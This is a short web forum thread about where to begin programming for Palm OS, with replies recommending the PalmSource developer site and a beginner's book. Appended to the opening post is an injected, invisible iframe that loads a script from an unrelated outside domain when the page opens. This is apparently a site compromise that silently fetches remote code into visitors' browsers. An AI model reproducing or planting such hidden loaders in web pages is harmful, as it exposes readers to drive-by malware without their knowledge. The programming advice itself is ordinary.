+ Reply to Thread

Programming newbie

I am interested in learning how to do some programming for palm os. Would anyone be interested in helping me figure out where to start. Or at least point me in the right direction?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Programming newbie

Going to this link:

http://www.palmsource.com/developers/

ought to keep you busy for a while!

Don't hesitate to pop back in here for specific questions!

Originally posted by agflyboyaf
    I am interested in learning how to do some programming for palm os. Would anyone be interested in helping me figure out where to start. Or at least point me in the right direction?

Geek

Palm programming

I had just purchased:

Palm Programming for the Absolute Beginner w/CD
    by Andrew Harris
    ISBN: 0761535241

It's pretty good. Having done some BASIC and COBOL programming in high school, it seems it's more of a begginer's programming course that just happens to be for the Palm. But if you don't have any programming experience it would be a good start.

There's nothing too advanced but it gives you the building blocks that you need to write more complex programs. Be aware that you're not writing .prc programs. You will need the compiler program on the Palm device in order to run any of the programs that you've written.

Some of the software on the CD was out of date, but most is usually available on-line in more updated versions. And if you're really going to get into this you're really going to need to purchase some of the shareware and/or some additional software.

I bought it from Buy.com for $18.89 which was the cheapest price I could find (the MSRP is $29.95).